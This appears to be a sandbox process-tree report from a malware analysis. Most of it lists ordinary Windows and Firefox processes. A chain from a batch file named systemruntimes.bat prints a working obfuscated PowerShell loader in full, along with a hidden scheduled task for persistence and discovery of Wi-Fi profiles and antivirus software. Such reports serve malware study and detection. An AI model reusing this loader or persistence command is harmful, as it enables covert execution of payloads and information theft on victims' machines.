- C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  2⤵
  PID:3968
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:3536
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:4740
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:4772
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:3492
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:4704
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:2412
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:2212
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:5876
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:1060
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:4136
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:5564
- C:\Windows\system32\BackgroundTaskHost.exe
  "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
  2⤵
  PID:3692
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:2416
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:4332
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:6736
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:7284
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:7732
- C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
  2⤵
  PID:1932
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1484

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3404

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\systemruntimes.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dBUfZrqvZgdO9Rq+waStJlRyD8zbjrQJ0lbUHppx9KI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('q2mbz4nFYEIiQNa8/mUfeQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fBUuY=New-Object System.IO.MemoryStream(,$param_var); $hwQJM=New-Object System.IO.MemoryStream; $RwMHK=New-Object System.IO.Compression.GZipStream($fBUuY, [IO.Compression.CompressionMode]::Decompress); $RwMHK.CopyTo($hwQJM); $RwMHK.Dispose(); $fBUuY.Dispose(); $hwQJM.Dispose(); $hwQJM.ToArray();}function execute_function($param_var,$param2_var){ $GqUPD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $edcNV=$GqUPD.EntryPoint; $edcNV.Invoke($null, $param2_var);}$yNbbe = 'C:\Users\Admin\AppData\Local\Temp\systemruntimes.bat';$host.UI.RawUI.WindowTitle = $yNbbe;$OHkNl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yNbbe).Split([Environment]::NewLine);foreach ($Cdvzr in $OHkNl) { if ($Cdvzr.StartsWith('YjKwXnnlAYeAfWUUhSrw')) { $WCbID=$Cdvzr.Substring(20); break; }}$payloads_var=[string[]]$WCbID.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_923_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_923.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:844
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_923.vbs"
      4⤵
      Checks computer location settings
      PID:1104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_923.bat" "
        5⤵
        
        PID:1640
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dBUfZrqvZgdO9Rq+waStJlRyD8zbjrQJ0lbUHppx9KI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('q2mbz4nFYEIiQNa8/mUfeQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fBUuY=New-Object System.IO.MemoryStream(,$param_var); $hwQJM=New-Object System.IO.MemoryStream; $RwMHK=New-Object System.IO.Compression.GZipStream($fBUuY, [IO.Compression.CompressionMode]::Decompress); $RwMHK.CopyTo($hwQJM); $RwMHK.Dispose(); $fBUuY.Dispose(); $hwQJM.Dispose(); $hwQJM.ToArray();}function execute_function($param_var,$param2_var){ $GqUPD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $edcNV=$GqUPD.EntryPoint; $edcNV.Invoke($null, $param2_var);}$yNbbe = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_923.bat';$host.UI.RawUI.WindowTitle = $yNbbe;$OHkNl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yNbbe).Split([Environment]::NewLine);foreach ($Cdvzr in $OHkNl) { if ($Cdvzr.StartsWith('YjKwXnnlAYeAfWUUhSrw')) { $WCbID=$Cdvzr.Substring(20); break; }}$payloads_var=[string[]]$WCbID.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:5740
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\jxeuas.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jxeuas.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\main.exe"
        8⤵
        Executes dropped EXE
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\main.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:3384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        10⤵
        
        PID:1216
        
        C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        11⤵
        
        PID:4480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        10⤵
        
        PID:1188
        
        C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        11⤵
        
        PID:6116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        10⤵
        
        PID:1868
        
        C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        11⤵
        
        PID:5972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        10⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4956
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        11⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        10⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4496
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        11⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        10⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4204
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        11⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\ilrwly.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ilrwly.exe"
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        System Location Discovery: System Language Discovery
        
        PID:524
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2536
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1924 -parentBuildID 20240401114208 -prefsHandle 1840 -prefMapHandle 1832 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df1c3d97-512a-4ee6-ab17-8d1b062ea53f} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" gpu
      4⤵
      PID:3576
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a860721c-e267-4b87-946b-ee263dc9d185} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" socket
      4⤵
      Checks processor information in registry
      PID:4472
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2884 -childID 1 -isForBrowser -prefsHandle 3244 -prefMapHandle 3184 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6db83cd2-c1bf-4b1a-baab-ee44f5721dfa} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1712
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3948 -childID 2 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1783cd1c-dfee-4044-96f1-356eb6d913df} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1748
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4836 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dd44627-5976-4a40-88a8-10a181d233fc} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" utility
      4⤵
      Checks processor information in registry
      PID:5672
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5260 -childID 3 -isForBrowser -prefsHandle 5276 -prefMapHandle 5272 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01efc989-97c0-401b-a2fd-63dc19f954ac} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:244
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4988 -childID 4 -isForBrowser -prefsHandle 5288 -prefMapHandle 5284 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97a71168-6270-4a97-b262-6fd6d8dd6cae} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1192
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 5 -isForBrowser -prefsHandle 5420 -prefMapHandle 4988 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5a2154a-f24c-4437-b301-53c75a27b3db} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4600
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -childID 6 -isForBrowser -prefsHandle 5216 -prefMapHandle 5644 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d5679fb-8147-472b-87b3-84a9fdf5598c} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:3220
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5320 -childID 7 -isForBrowser -prefsHandle 5384 -prefMapHandle 5356 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a81152d9-cba8-4442-b97c-9ea62dfd4ffc} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:864
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5384 -childID 8 -isForBrowser -prefsHandle 6224 -prefMapHandle 6152 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e77899b6-9648-4417-ab83-c85d1b8049aa} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4720
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6824 -childID 9 -isForBrowser -prefsHandle 7596 -prefMapHandle 6348 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {224f678f-6d3f-4ecf-8279-8b0cb42505db} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1848
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7856 -childID 10 -isForBrowser -prefsHandle 7012 -prefMapHandle 6100 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4b2de54-73d1-4c18-8a15-ee77523bd876} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:1668
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7676 -childID 11 -isForBrowser -prefsHandle 7948 -prefMapHandle 7808 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {388813ac-ad9d-41ab-b06b-135f8a868e40} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:4808
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7388 -childID 12 -isForBrowser -prefsHandle 7480 -prefMapHandle 7536 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb4f1382-ee61-40ea-850a-157fc1fb2893} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:2096
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6352 -childID 13 -isForBrowser -prefsHandle 3648 -prefMapHandle 5644 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ccfbef36-8a58-451c-a19c-06b9efce91c6} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:5708
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8080 -childID 14 -isForBrowser -prefsHandle 8088 -prefMapHandle 8092 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b402a3dd-3530-4e3b-873f-7e5e1885b29a} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:5408
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7976 -childID 15 -isForBrowser -prefsHandle 2272 -prefMapHandle 8284 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e398b54c-8794-456e-9b24-ad178532c18d} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7704
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8288 -childID 16 -isForBrowser -prefsHandle 8392 -prefMapHandle 8400 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {684cef1e-71a7-43ff-89cf-567950237ad3} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7736
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7968 -childID 17 -isForBrowser -prefsHandle 7748 -prefMapHandle 8424 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85b6322d-c904-4c3c-b027-399863fdb737} 2536 "\\.\pipe\gecko-crash-server-pipe.2536" tab
      4⤵
      PID:7240
  - - C:\Program Files\Mozilla Firefox\firefox.exe
